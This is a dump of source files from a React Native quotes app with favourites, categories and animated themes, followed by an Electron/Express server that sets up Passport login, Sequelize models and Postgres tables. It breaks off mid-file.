flexDirection: 'row',
justifyContent: 'space-between',
},
footerHelpText: {
flex: 1,
fontFamily: fonts.primaryLight,
color: 'gray',
fontSize: '1.2rem',
fontWeight: '100',
paddingVertical: '0.5rem',
},
footerIcons: {
flexDirection: 'row',
justifyContent: 'flex-end',
alignItems: 'center',
},
footerIconContainer: {
paddingVertical: '0.5rem',
paddingHorizontal: '0.3rem',
},
footerIcon: {
height: '1.2rem',
width: '1.2rem',
marginHorizontal: '0.5rem',
tintColor: colors.dark,
},
footerIconLight: {
tintColor: colors.light,
},
});
<|start_filename|>src/modules/bookmarks/BookmarksView.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import { NavigationEvents } from 'react-navigation';
import {
View,
Text,
Image,
TouchableOpacity,
FlatList,
} from 'react-native';
import styles from './styles';
export default function BookmarksView(props) {
const {
isDarkBg,
navigation,
bookmarksList,
onWillFocus,
} = props;
return (
<View
style={[
styles.container,
isDarkBg && styles.containerDark,
]}
>
{/** To update bookmarks list when the user navigate to the screen */}
<NavigationEvents
onWillFocus={onWillFocus}
/>
<View
style={styles.header}
>
<TouchableOpacity
onPress={() => navigation.pop()}
>
<Image
source={require('../../../assets/icons/arrow-left.png')}
style={[
styles.headerButton,
styles.headerIcon,
isDarkBg && styles.headerIconDark,
]}
resizeMode="contain"
/>
</TouchableOpacity>
<Text
style={[
styles.headerTitle,
isDarkBg && styles.headerTitleDark,
]}
>
My Favorites
</Text>
<View style={styles.headerButton} />
</View>
<FlatList
showsVerticalScrollIndicator={false}
style={styles.body}
data={bookmarksList}
keyExtractor={item => `${item.id}`}
renderItem={({ item }) => (
<TouchableOpacity
style={styles.quote}
onPress={() => navigation.navigate('Quote', { quote: item })}
>
<Text
style={[
styles.quoteText,
isDarkBg && styles.quoteTextDark,
]}
>
{item.quote}
</Text>
<Text style={styles.quoteAuthor}>{item.author}</Text>
</TouchableOpacity>
)}
ListEmptyComponent={(
<View style={styles.emptyContainer}>
<Text
style={[
styles.emptyText,
isDarkBg && styles.emptyTextDark,
]}
>
You have no favorite quotes yet
</Text>
</View>
)}
/>
</View>
);
}
BookmarksView.propTypes = {
isDarkBg: PropTypes.bool.isRequired,
navigation: PropTypes.shape({
pop: PropTypes.func.isRequired,
}).isRequired,
bookmarksList: PropTypes.arrayOf(PropTypes.shape({
quote: PropTypes.string.isRequired,
author: PropTypes.string.isRequired,
})).isRequired,
onWillFocus: PropTypes.func.isRequired,
};
<|start_filename|>src/modules/sidebar/styles.js<|end_filename|>
import EStyleSheet from 'react-native-extended-stylesheet';
import { ifIphoneX } from 'react-native-iphone-x-helper/index';
import { colors, fonts } from '../../config';
export default EStyleSheet.create({
container: {
flex: 1,
padding: 20,
paddingTop: '2rem',
backgroundColor: colors.dark,
justifyContent: 'space-between',
...ifIphoneX({
paddingTop: 50,
paddingBottom: 30,
}),
},
containerDark: {
backgroundColor: colors.light,
},
section: {
marginBottom: '2rem',
},
sectionLink: {
flexDirection: 'row',
justifyContent: 'space-between',
},
sectionLinkIcon: {
height: '1rem',
tintColor: colors.light,
},
sectionLinkIconDark: {
tintColor: colors.dark,
},
sectionHeader: {
fontFamily: fonts.primaryRegular,
fontSize: '1rem',
fontWeight: '200',
color: colors.light,
marginBottom: '0.7rem',
},
sectionHeaderDark: {
color: colors.dark,
},
sectionHeaderLight: {
color: colors.light,
},
sectionRow: {
flexDirection: 'row',
flexWrap: 'wrap',
},
sectionToggle: {
marginRight: '0.5rem',
marginVertical: '0.3rem',
},
creditsContainer: {
alignSelf: 'flex-end',
alignItems: 'flex-end',
justifyContent: 'flex-end',
paddingTop: '1rem',
},
creditsText: {
fontFamily: fonts.primaryLight,
fontSize: '1rem',
fontWeight: '200',
color: colors.gray,
marginBottom: '0.7rem',
},
});
<|start_filename|>src/modules/quotes/QuotesView.js<|end_filename|>
import React from 'react';
import {
View,
TouchableWithoutFeedback,
Animated,
TouchableOpacity,
Dimensions,
ActivityIndicator,
} from 'react-native';
import SideMenu from 'react-native-side-menu';
import Sidebar from '../sidebar/SidebarViewContainer';
import {
AnimatedTextSwitch,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
} from '../../components';
import styles from './styles';
import { colors } from '../../config';
export default function QuotesView({
currentQuote,
newQuote,
isDarkBg,
toggleBookmark,
updateContainerRef,
shareQuote,
isSharing,
isMenuOpened,
setIsMenuOpened,
navigation,
quotesLoaded,
}) {
if (!quotesLoaded) {
return (
<View style={styles.loadingContainer}>
<ActivityIndicator color={colors.light} />
</View>
);
}
return (
<SideMenu
openMenuOffset={Dimensions.get('window').width / 5 * 4}
isOpen={isMenuOpened}
onChange={setIsMenuOpened}
menuPosition="right"
menu={<Sidebar navigation={navigation} />}
bounceBackOnOverdraw={false}
animationFunction={(prop, value) => Animated.timing(prop, {
toValue: value,
friction: 8,
})}
>
<TouchableWithoutFeedback
onPress={newQuote}
>
<AnimatedBackgroundSwitch
ref={ref => updateContainerRef(ref)}
isDark={isDarkBg}
style={{
...styles.container,
}}
>
<View style={styles.header}>
<AnimatedIconSwitch
source={require('../../../assets/icons/quote.png')}
style={{
...styles.headerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
{ !isSharing && (
<TouchableOpacity
onPress={() => setIsMenuOpened(true)}
>
<View>
<AnimatedIconSwitch
source={require('../../../assets/icons/menu.png')}
style={{
...styles.headerIcon,
...styles.headerIconMenu,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableOpacity>
)}
</View>
{ currentQuote && (
<View style={styles.quoteContainer}>
<AnimatedTextSwitch
style={{
...styles.quoteText,
...isDarkBg ? styles.quoteTextLight : {},
}}
>
{currentQuote && currentQuote.quote}
</AnimatedTextSwitch>
<AnimatedTextSwitch
style={{
...styles.quoteAuthor,
...isDarkBg ? styles.quoteAuthorLight : {},
}}
>
{currentQuote && currentQuote.author}
</AnimatedTextSwitch>
</View>
)}
{ !isSharing && (
<View style={styles.footer}>
<AnimatedTextSwitch
style={{
...styles.footerHelpText,
}}
>
tap for more
</AnimatedTextSwitch>
<View style={styles.footerIcons}>
<TouchableWithoutFeedback onPress={() => toggleBookmark(currentQuote)}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={currentQuote && currentQuote.bookmarked ?
require('../../../assets/icons/bookmark-filled.png') :
require('../../../assets/icons/bookmark.png')
}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
<TouchableWithoutFeedback onPress={() => shareQuote()}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={require('../../../assets/icons/share.png')}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
</View>
</View>
)}
</AnimatedBackgroundSwitch>
</TouchableWithoutFeedback>
</SideMenu>
);
}
<|start_filename|>src/modules/sidebar/SidebarViewContainer.js<|end_filename|>
import { connect } from 'react-redux';
import { Linking } from 'react-native';
import { compose, withHandlers } from 'recompose';
import { credentialsLink } from '../../config';
import SidebarView from './SidebarView';
import {
changeBgType,
toggleCategory,
selectAllCategories,
} from '../quotes/QuotesState';
export default compose(
connect(
state => ({
categories: state.quotes.categories,
bgType: state.quotes.bgType,
showFavorites: state.quotes.showFavorites,
isDarkBg: state.quotes.isDarkBg,
}),
dispatch => ({
changeBgType: bgType => dispatch(changeBgType(bgType)),
toggleCategory: category => dispatch(toggleCategory(category)),
selectAllCategories: () => dispatch(selectAllCategories()),
}),
),
withHandlers({
openCredits: () => () => {
Linking.canOpenURL(credentialsLink).then((supported) => {
if (supported) {
Linking.openURL(credentialsLink);
}
});
},
}),
)(SidebarView);
<|start_filename|>src/modules/quotes/QuotesState.js<|end_filename|>
/* eslint-disable no-case-declarations,no-confusing-arrow */
import _ from 'lodash';
import Realm from 'realm';
const quotesData = require('./data');
export const BG_TYPES = {
BG_WHITE: 'BG_WHITE',
BG_BLACK: 'BG_BLACK',
BG_RANDOM: 'BG_RANDOM',
};
// Realm schema of the quote
export const QuoteSchema = {
name: 'Quote',
primaryKey: 'id',
properties: {
quote: 'string',
author: 'string',
displayedTimes: { type: 'int', default: 0 },
bookmarked: { type: 'bool', default: false },
id: 'int',
category: 'string',
bgType: { type: 'string', optional: true, default: BG_TYPES.BG_WHITE },
},
};
const initialState = {
quotesLoaded: false,
currentQuote: null,
isDarkBg: false,
bgType: BG_TYPES.BG_RANDOM,
showFavorites: false,
// TODO: Put it inside Realm db
categories: {
inspire: true,
management: false,
sports: false,
life: false,
funny: false,
love: false,
art: false,
students: false,
},
};
export const LOAD_QUOTES = 'QuotesState/LOAD_QUOTES';
export const NEXT_QUOTE = 'QuotesState/NEXT_QUOTE';
export const TOGGLE_BOOKMARK = 'QuotesState/TOGGLE_BOOKMARK';
export const CHANGE_BG_TYPE = 'QuotesState/CHANGE_BG_TYPE';
export const TOGGLE_CATEGORY = 'QuotesState/TOGGLE_CATEGORY';
export const SELECT_ALL_CATEGORIES = 'QuotesState/SELECT_ALL_CATEGORIES';
/**
* Initial quotes loading into the redux store and fill Realm DB
* @returns {Function} Dispatches LOAD_QUOTES action with new quotes
*/
export function loadQuotes() {
return (dispatch) => {
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
realm.write(() => {
quotesData.quotes.forEach((quote, index) => {
realm.create('Quote', {
...quote,
author: quote.author || 'Unknown',
displayedTimes: 0,
bookmarked: false,
id: index,
});
});
});
dispatch({
type: LOAD_QUOTES,
});
});
};
}
/**
* Choosing the next quote for displaying.
* @returns {Function} Dispatches NEXT_QUOTE action with the new quote
*/
export function newQuote() {
return (dispatch, getState) => {
const state = getState();
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
// Get all quotes
const quotes = realm.objects('Quote');
// Create realm query with selected categories
const filterExpression = Object.keys(state.quotes.categories)
.reduce((accumulator, currentValue) => {
if (state.quotes.categories[currentValue]) {
if (accumulator.length === 0) {
return `category = "${currentValue}"`;
}
return `${accumulator} OR category = "${currentValue}"`;
}
return accumulator;
}, '');
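        // For example (illustrative): with { inspire: true, life: true, funny: false }
        // the reduce above yields 'category = "inspire" OR category = "life"'.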
// Pick the next quote sorted by displayed times
const nextQuote = quotes.filtered(filterExpression).sorted('displayedTimes')[0];
realm.write(() => {
nextQuote.displayedTimes += 1;
dispatch({
type: NEXT_QUOTE,
payload: {
nextQuote: JSON.parse(JSON.stringify(nextQuote)),
index: nextQuote.id,
},
});
});
realm.close();
});
};
}
export function changeBgType(newBgType) {
return {
type: CHANGE_BG_TYPE,
payload: newBgType,
};
}
export function toggleBookmark(quoteToBookmark) {
return (dispatch, getState) => {
const state = getState();
dispatch({
type: TOGGLE_BOOKMARK,
});
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
const quote = realm.objects('Quote').filtered(`id = ${quoteToBookmark.id}`)[0];
realm.write(() => {
quote.bookmarked = !quote.bookmarked;
quote.bgType = state.quotes.isDarkBg ? BG_TYPES.BG_BLACK : BG_TYPES.BG_WHITE;
});
realm.close();
});
};
}
export function toggleCategory(category) {
return {
type: TOGGLE_CATEGORY,
payload: category,
};
}
export function selectAllCategories() {
return {
type: SELECT_ALL_CATEGORIES,
};
}
export default function QuotesReducer(state = initialState, action) {
switch (action.type) {
case LOAD_QUOTES:
return {
...state,
quotesLoaded: true,
};
case NEXT_QUOTE:
return {
...state,
currentQuote: action.payload.nextQuote,
isDarkBg: state.bgType === BG_TYPES.BG_RANDOM ? !!_.random(0, 1) : state.isDarkBg,
};
case TOGGLE_BOOKMARK:
return {
...state,
currentQuote: {
...state.currentQuote,
bookmarked: !state.currentQuote.bookmarked,
},
};
case CHANGE_BG_TYPE:
return {
...state,
bgType: action.payload,
// eslint-disable-next-line no-nested-ternary
isDarkBg: action.payload === BG_TYPES.BG_WHITE ? false :
(action.payload === BG_TYPES.BG_RANDOM ? state.isDarkBg : true),
};
case TOGGLE_CATEGORY:
const selectedCategoriesCount =
// All categories
Object.keys(state.categories)
// Filtered by selected
.filter(c => state.categories[c]);
const isAllCategoriesSelected =
selectedCategoriesCount.length ===
Object.keys(state.categories).length;
const isOnlyOneCategorySelected = selectedCategoriesCount.length === 1;
// If the user tries to unselect the only selected category
if (isOnlyOneCategorySelected && state.categories[action.payload]) {
return {
...state,
};
}
return {
...state,
categories:
// If all categories selected
isAllCategoriesSelected ?
{
// Mark all as unselected
...Object.keys(state.categories).reduce((a, c) => ({ ...a, [c]: false }), {}),
// Except this one
[action.payload]: true,
} :
{
...state.categories,
[action.payload]: !state.categories[action.payload],
}
,
};
case SELECT_ALL_CATEGORIES:
return {
...state,
categories: {
inspire: true,
management: true,
sports: true,
life: true,
funny: true,
love: true,
art: true,
students: true,
},
};
default:
return state;
}
}
<|start_filename|>src/modules/sidebar/SidebarView.js<|end_filename|>
import React from 'react';
import {
View,
Text,
TouchableOpacity,
} from 'react-native';
import styles from './styles';
import {
ToggleButton,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
} from '../../components';
import {
BG_TYPES,
} from '../quotes/QuotesState';
export default function Sidebar(props) {
const {
categories,
bgType,
changeBgType,
toggleCategory,
selectAllCategories,
isDarkBg,
navigation,
openCredits,
} = props;
const hasUnselectedCategory = Object.keys(categories).filter(c => !categories[c]).length > 0;
return (
<AnimatedBackgroundSwitch
style={styles.container}
isDark={!isDarkBg}
>
<View>
<TouchableOpacity
onPress={() => navigation.navigate('Bookmarks')}
style={[styles.section, styles.sectionLink]}
>
<Text
style={[
styles.sectionHeader,
isDarkBg && styles.sectionHeaderDark,
]}
>
My Favorites
</Text>
<AnimatedIconSwitch
isDark={isDarkBg}
source={require('../../../assets/icons/arrow-right.png')}
style={{
...styles.sectionLinkIcon,
...isDarkBg ? styles.sectionLinkIconDark : {},
}}
/>
</TouchableOpacity>
<View style={styles.section}>
<Text
style={[
styles.sectionHeader,
isDarkBg && styles.sectionHeaderDark,
]}
>
Background Color
</Text>
<View style={styles.sectionRow}>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={bgType === BG_TYPES.BG_WHITE}
onPress={() => changeBgType(BG_TYPES.BG_WHITE)}
>
White
</ToggleButton>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={bgType === BG_TYPES.BG_BLACK}
onPress={() => changeBgType(BG_TYPES.BG_BLACK)}
>
Black
</ToggleButton>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={bgType === BG_TYPES.BG_RANDOM}
onPress={() => changeBgType(BG_TYPES.BG_RANDOM)}
>
Random
</ToggleButton>
</View>
</View>
<View style={styles.section}>
<Text
style={[
styles.sectionHeader,
isDarkBg && styles.sectionHeaderDark,
]}
>
Categories
</Text>
<View style={styles.sectionRow}>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={!hasUnselectedCategory}
onPress={selectAllCategories}
>
All Categories
</ToggleButton>
{ Object.keys(categories).sort().map(category => (
<ToggleButton
isDark={isDarkBg}
key={category}
style={styles.sectionToggle}
selected={hasUnselectedCategory && categories[category]}
onPress={() => toggleCategory(category)}
>
{category}
</ToggleButton>
))}
</View>
</View>
</View>
<View style={styles.creditsContainer}>
<TouchableOpacity onPress={openCredits}>
<Text
style={styles.creditsText}
>
credits
</Text>
</TouchableOpacity>
</View>
</AnimatedBackgroundSwitch>
);
}
<|start_filename|>src/components/AnimatedTextSwitch.js<|end_filename|>
import React from 'react';
import {
Animated,
Easing,
} from 'react-native';
import config from '../config';
/**
 * Component that animates text changes with an opacity effect.
 * It fades the previous text to opacity 0, swaps in the new text, and then animates the opacity back to 1.
*/
class AnimatedTextSwitch extends React.Component {
constructor(props) {
super(props);
this.state = {
previousText: props.children,
textOpacity: new Animated.Value(1),
textColor: props.style.color,
};
}
componentWillReceiveProps(newProps) {
const newText = newProps.children;
if (newText !== this.state.previousText ||
this.state.textColor !== newProps.style.color
) {
Animated.timing(
this.state.textOpacity,
{
toValue: 0,
duration: config.defaultAnimationDuration,
easing: Easing.in(Easing.sin),
},
).start(() => {
this.setState({
previousText: newText,
textColor: newProps.style.color,
}, () => {
Animated.timing(
this.state.textOpacity,
{
toValue: 1,
duration: config.defaultAnimationDuration,
easing: Easing.in(Easing.sin),
},
).start();
});
});
}
}
render() {
return (
<Animated.Text
{...this.props}
style={{
...this.props.style,
opacity: this.state.textOpacity,
color: this.state.textColor,
}}
>
{this.state.previousText}
</Animated.Text>
);
}
}
export default AnimatedTextSwitch;
<|start_filename|>src/components/ToggleButton.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import {
TouchableOpacity,
Text,
} from 'react-native';
import EStyleSheet from 'react-native-extended-stylesheet';
import { colors, fonts } from '../config';
export default function ToggleButton(props) {
const { selected, children, isDark } = props;
return (
<TouchableOpacity
{...props}
style={[
styles.button,
isDark && styles.buttonDark,
selected && styles.buttonSelected,
selected && isDark && styles.buttonSelectedDark,
props.style,
]}
>
<Text
style={[
styles.caption,
selected && styles.captionSelected,
selected && isDark && styles.captionSelectedDark,
]}
>
{children}
</Text>
</TouchableOpacity>
);
}
ToggleButton.propTypes = {
selected: PropTypes.bool,
children: PropTypes.string.isRequired,
};
ToggleButton.defaultProps = {
selected: false,
};
const styles = EStyleSheet.create({
button: {
paddingHorizontal: '0.8rem',
paddingVertical: '0.6rem',
borderRadius: '1.5rem',
backgroundColor: colors.flatDarkGray,
},
buttonDark: {
backgroundColor: colors.lightGray,
},
buttonSelected: {
backgroundColor: colors.light,
},
buttonSelectedDark: {
backgroundColor: colors.darkGray,
},
caption: {
fontFamily: fonts.primaryLight,
fontSize: '0.8rem',
fontWeight: '300',
color: colors.gray,
},
captionSelected: {
color: colors.darkGray,
},
captionSelectedDark: {
color: colors.light,
},
});
<|start_filename|>src/components/AnimatedIconSwitch.js<|end_filename|>
import React from 'react';
import {
Animated,
Easing,
} from 'react-native';
import config from '../config';
/**
 * This component animates icon changes. It can animate opacity, tintColor and the icon source.
*/
class AnimatedIconSwitch extends React.Component {
constructor(props) {
super(props);
this.state = {
iconOpacity: new Animated.Value(1),
tintColor: props.style.tintColor,
source: props.source,
};
}
componentWillReceiveProps(newProps) {
const isTintColorChanging = newProps.style.tintColor !== this.state.tintColor;
const isSourceChanging = this.state.source !== newProps.source;
if (isTintColorChanging || isSourceChanging) {
Animated.timing(
this.state.iconOpacity,
{
toValue: 0,
duration: config.defaultAnimationDuration / (isTintColorChanging ? 1 : 3),
easing: Easing.in(Easing.sin),
},
).start(() => {
this.setState({
tintColor: newProps.style.tintColor,
source: newProps.source,
}, () => {
Animated.timing(
this.state.iconOpacity,
{
toValue: 1,
duration: config.defaultAnimationDuration,
easing: Easing.in(Easing.sin),
},
).start();
});
});
}
}
render() {
return (
<Animated.Image
resizeMode="contain"
{...this.props}
source={this.state.source}
style={{
...this.props.style,
opacity: this.state.iconOpacity,
tintColor: this.state.tintColor,
}}
/>
);
}
}
export default AnimatedIconSwitch;
<|start_filename|>src/components/AnimatedBackgroundSwitch.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import {
Animated,
Easing,
} from 'react-native';
import config from '../config';
/**
* Component that animates background color change from light to dark.
* @param {boolean} isDark Determines the next color (is it dark or not)
*/
class AnimatedBackgroundSwitch extends React.Component {
static propTypes = {
isDark: PropTypes.bool.isRequired,
};
constructor(props) {
super(props);
this.state = {
bgColor: new Animated.Value(props.isDark ? 0 : 1),
isDark: props.isDark,
};
}
componentWillReceiveProps(newProps) {
if (this.state.isDark !== newProps.isDark) {
Animated.timing(
this.state.bgColor,
{
toValue: this.state.isDark ? 1 : 0,
duration: config.defaultAnimationDuration * 2,
easing: Easing.in(Easing.sin),
},
).start(() => {
this.setState({
isDark: newProps.isDark,
});
});
}
}
render() {
// Interpolating color to make a smooth transition
const color = this.state.bgColor.interpolate({
inputRange: [0, 1],
outputRange: ['rgba(0, 0, 0, 1.0)', 'rgba(255, 255, 255, 1.0)'],
});
return (
<Animated.View
{...this.props}
style={{
...this.props.style,
backgroundColor: color,
}}
/>
);
}
}
export default AnimatedBackgroundSwitch;
<|start_filename|>src/modules/bookmarks/styles.js<|end_filename|>
import EStyleSheet from 'react-native-extended-stylesheet';
import { ifIphoneX } from 'react-native-iphone-x-helper/index';
import { colors, fonts } from '../../config';
export default EStyleSheet.create({
container: {
flex: 1,
padding: 20,
paddingTop: '2rem',
backgroundColor: colors.light,
...ifIphoneX({
paddingTop: 50,
paddingBottom: 50,
}),
},
containerDark: {
backgroundColor: colors.dark,
},
header: {
flexDirection: 'row',
alignItems: 'center',
justifyContent: 'space-between',
paddingBottom: '1rem',
},
headerButton: {
width: '1.5rem',
},
headerIcon: {
tintColor: colors.dark,
height: '1rem',
},
headerIconDark: {
tintColor: colors.light,
},
headerTitle: {
fontSize: '1rem',
fontWeight: '200',
fontFamily: fonts.primaryLight,
color: colors.dark,
},
headerTitleDark: {
color: colors.light,
},
quote: {
paddingVertical: '1.5rem',
},
body: {},
quoteText: {
fontFamily: fonts.primaryLight,
fontWeight: '200',
fontSize: '1.3rem',
color: colors.dark,
},
quoteTextDark: {
color: colors.light,
},
quoteAuthor: {
fontFamily: fonts.primaryLight,
fontWeight: '200',
fontSize: '0.8rem',
color: colors.gray,
marginTop: '0.8rem',
},
emptyContainer: {
flex: 1,
alignItems: 'center',
justifyContent: 'center',
padding: '2rem',
},
emptyText: {
fontFamily: fonts.primaryLight,
fontWeight: '200',
fontSize: '0.8rem',
color: colors.dark,
textAlign: 'center',
},
emptyTextDark: {
color: colors.light,
},
});
<|start_filename|>src/modules/navigation/Navigator.js<|end_filename|>
import {
createStackNavigator,
} from 'react-navigation';
import Quotes from '../quotes/QuotesViewContainer';
import Bookmarks from '../bookmarks/BookmarksViewContainer';
import Quote from '../quote/QuoteViewContainer';
export default createStackNavigator({
Quotes,
Bookmarks,
Quote,
}, {
headerMode: 'none',
initialRouteName: 'Quotes',
});
<|start_filename|>src/redux/store.js<|end_filename|>
import { applyMiddleware, createStore, compose } from 'redux';
import { persistStore, persistReducer } from 'redux-persist';
import storage from 'redux-persist/lib/storage';
import middleware from './middleware';
import reducer from './reducer';
const enhancers = [
applyMiddleware(...middleware),
];
/* Enable redux dev tools only in development.
* We suggest using the standalone React Native Debugger extension:
* https://github.com/jhen0409/react-native-debugger
*/
/* eslint-disable no-undef */
const composeEnhancers = (
__DEV__ &&
typeof (window) !== 'undefined' &&
window.__REDUX_DEVTOOLS_EXTENSION_COMPOSE__
) || compose;
/* eslint-enable no-undef */
const enhancer = composeEnhancers(...enhancers);
const persistConfig = {
key: 'root',
storage,
};
const persistedReducer = persistReducer(persistConfig, reducer);
export const store = createStore(
persistedReducer,
{},
enhancer,
);
export const persistor = persistStore(store);
<|start_filename|>App.js<|end_filename|>
import { Provider } from 'react-redux';
import React from 'react';
import codePush from 'react-native-code-push';
import { View, ActivityIndicator, StyleSheet } from 'react-native';
import { PersistGate } from 'redux-persist/integration/react';
import { store, persistor } from './src/redux/store';
import Navigator from './src/modules/navigation/Navigator';
function App() {
return (
<Provider store={store}>
<PersistGate
loading={(
<View style={styles.container}>
<ActivityIndicator color="#FFFFFF" />
</View>
)}
persistor={persistor}
>
<Navigator />
</PersistGate>
</Provider>
);
}
const styles = StyleSheet.create({
container: {
flex: 1,
justifyContent: 'center',
alignItems: 'center',
backgroundColor: 'black',
},
});
export default codePush(App);
| gaykov/minimal-quotes |
<|start_filename|>clean_server/resources/app/models/User.js<|end_filename|>
var Sequelize = require('sequelize')
//Sequelize is required for its data type constants (Sequelize.STRING, etc.)
//the attributes defined here are used when
//we define the model on our connection in
//models.js
var attributes = {
username: {
type: Sequelize.STRING,
allowNull: false,
unique: true,
validate: {
is: /^[a-z0-9\_\-]+$/i,
}
},
email: {
//defines email as a string value
type: Sequelize.STRING,
validate: {
isEmail: true
}
},
first: {
type: Sequelize.STRING,
},
last: {
type: Sequelize.STRING,
},
password: {
type: Sequelize.STRING,
},
salt: {
type: Sequelize.STRING
},
admin: {
type: Sequelize.STRING
},
city:{
type: Sequelize.STRING
},
specialty:{
type: Sequelize.STRING
}
}
var options = {
//just ensures table names do not change
freezeTableName: true
}
module.exports.attributes = attributes
module.exports.options = options
<|start_filename|>clean_server/resources/app/setupPg.js<|end_filename|>
const pg = require('pg');
const connectionString = process.env.DATABASE_URL || 'postgres://localhost:5432/doctor';
//need to create a doctor db
const client = new pg.Client(connectionString);
client.connect();
const query = client.query(
'CREATE TABLE operations( pkid serial NOT NULL, userid integer, start time without time zone, end1 time without time zone, activity character varying, yearmonthday character varying, color character varying, pfirst character varying, plast character varying, dfirst character varying, dlast character varying, requestid integer, CONSTRAINT operations_pkey PRIMARY KEY (pkid))');
query.on('end', () => { client.end(); });
const query2 = client.query(
'CREATE TABLE request( pkid serial NOT NULL, stime time without time zone, etime time without time zone, requestid integer, yearmonthday character varying, docid integer, userid integer, activity character varying, first character varying, last character varying, dfirst character varying, dlast character varying, update character varying, CONSTRAINT request_pkey PRIMARY KEY (pkid))');
query2.on('end', () => { client.end(); });
<|start_filename|>clean_server/resources/app/setupPassport.js<|end_filename|>
var passport = require('passport'),
LocalStrategy = require('passport-local').Strategy,
bcrypt = require('bcrypt'),
Model = require('./models/models.js')
module.exports = function(app) {
//here we are adding the passport middleware to express
app.use(passport.initialize()) //initializes passport on the express app
app.use(passport.session())// enables persistent login sessions (backed by express-session)
//when we use 'local' we are referring to this local strategy
passport.use(new LocalStrategy(
function(username, password, done) {
//checks if there is a user with that username
Model.User.findOne({
where: {
'username': username
}
}).then(function (user) { //gets called when the findOne promise is fulfilled
if (user == null) {
return done(null, false, { message: 'Incorrect credentials.' })
}
var hashedPassword = bcrypt.hashSync(password, user.salt)
//a hashing algorithm always produces the same output for the same input,
//and you cannot go backwards from a hashed string to recover the original.
//the salt protects against rainbow tables (precomputed tables of common
//passwords and their hashes), because a rainbow table does not know the salt.
//a salt does not protect against brute-force or dictionary attacks
//(which focus on hashing common passwords on the fly).
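//illustrative aside (not part of the original flow): since the hash is
//deterministic for a fixed salt, re-hashing the submitted password and
//comparing, as done below, behaves like bcrypt's own helper:
//  bcrypt.compareSync(password, user.password) // -> true / false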
//check if password matched password in DB
if (user.password === hashedPassword) {
return done(null, user)
}
//if not return invalid credentials
return done(null, false, { message: 'Incorrect credentials.' })
})
}
))
passport.serializeUser(function(user, done) {
done(null, user.id)
})
passport.deserializeUser(function(id, done) {
Model.User.findOne({
where: {
'id': id
}
}).then(function (user) {
if (user == null) {
done(new Error('Wrong user id.'))
}
done(null, user)
})
})
}
<|start_filename|>scurrent_clean/app/src/renderer/routes.js<|end_filename|>
export default [
{
path: '/signup',
name: 'signup',
component: require('components/signup')
},
{
path: '/calendar',
name: 'calendar',
component: require('components/calendar')
},
{
path: '/',
name: 'login',
component: require('components/login')
},
]
<|start_filename|>clean_server/index.js<|end_filename|>
const express = require('./resources/app/servertest3.js'); //
const electron = require('electron')
var win;
const {app,BrowserWindow} = electron
app.on('ready', () => {
win = new BrowserWindow({width:1035, height:825})
// let win = new BrowserWindow({width:1035, height:825})
//win.loadURL(`file://${__dirname}/index.html`)
win.loadURL('http://localhost:3000/display4');
win.focus();
});
<|start_filename|>clean_server/resources/app/sequelize.js<|end_filename|>
//exports the sequelize connection (built from the connection string)
var Sequelize = require('sequelize'),
sequelize = new Sequelize('postgres://daniel:admin@localhost:5432/seq')
module.exports = sequelize
<|start_filename|>clean_server/resources/app/setupHandlebars.js<|end_filename|>
var ehandlebars = require('express-handlebars')
module.exports = function(app) {
var hbs = ehandlebars.create({
defaultLayout: 'app',
helpers: {
section: function(name, options) {
if (!this._sections) this._sections = {}
this._sections[name] = options.fn(this)
return null
}
}
})
app.engine('handlebars', hbs.engine)
app.set('view engine', 'handlebars')
}
<|start_filename|>clean_server/resources/app/servertest3.js<|end_filename|>
var express = require('express'),
cors = require('cors'),
//we use Express, Express is the standard server
//framework for Node
app = express(),
setupHandlebars = require('./setupHandlebars.js')(app),
setupPassport = require('./setupPassport'),
flash = require('connect-flash'),
appRouter = require('./routers/appRouter.js')(express),
session = require('express-session'),
bodyParser = require('body-parser'),
cookieParser = require('cookie-parser'),
multer = require('multer'),
pg = require("pg"),
jsonParser = bodyParser.json()
var yearmonthday;
var port = process.env.PORT || 8080
app.use(cors());
app.use(cookieParser())
app.use(session({ secret: '4564f6s4fdsfdfd', resave: false, saveUninitialized: false }))
app.use('/styles', express.static(__dirname + '/styles'))
app.use(flash())
app.use(function(req, res, next) {
res.locals.errorMessage = req.flash('error')
next()
});
app.use(jsonParser)
app.use(bodyParser.urlencoded({
extended: true
}))
setupPassport(app)
app.use('/', appRouter)
var pkid = 0;
//When you have app.use(object) instead of
// app.use('/thisPath', object), the app.use(object) form runs
// with every request, whereas the app.use('/thisPath', object) form
// only runs when that path is requested,
// so app.use(object) is basically global middleware
app.use(bodyParser.json());
//the body-parser module parses JSON bodies submitted in HTTP POST requests.
app.use(bodyParser.urlencoded({extended: true}));
app.use(express.static(__dirname + '/public')); //needed to serve css
app.set('views', __dirname+'/views');
app.set('view engine', 'ejs');
//database objects
var pes = {
user: 'postgres', //env var: PGUSER used to be daniel
database: 'pes2013restore', //env var: PGDATABASE
password: '<PASSWORD>', //env var: PGPASSWORD
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
};
var doctor = {
user: 'postgres', //env var: PGUSER used to be daniel
database: 'doctor', //env var: PGDATABASE
password: '<PASSWORD>', //env var: PGPASSWORD
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
}
var doctorUsers = {//new
